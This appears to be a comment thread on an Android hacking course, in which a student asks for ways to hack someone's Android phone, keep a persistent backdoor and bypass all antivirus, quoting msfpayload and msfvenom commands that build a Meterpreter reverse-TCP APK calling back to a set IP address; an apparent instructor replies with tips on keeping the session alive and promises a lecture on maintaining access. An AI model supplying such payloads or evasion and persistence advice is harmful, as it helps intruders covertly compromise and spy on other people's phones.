Android persistent

the link you send me to create android persistent it does not work and in android attack i am facing difficulties i think these attack are useless to hack someone android tell me other method to create android persistent and hacking android because my aim to buy you are course to learn android hacking but these attack does not work some some time work for short time and only work when target using our apk file as he stop using or use an other app our attack stop working these are not smart method these attack is already available on the internet what is new in this course please tell me some smart method to create android persistent which bypass all antiverus because the link https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ first command msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/abcde.apk does not work for me then i create pay load using msfvenom -p android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk i replace lhost with my own ip but it caught by android antivirus and also persistent method does not work

You should still be able to run the commands unless the person fully quits the game, so its ok if they press the home button, but you’ll loose the session if they open the activity manager and quit the game.

I will be updating the course to add a lecture on how to maintain your access in Android .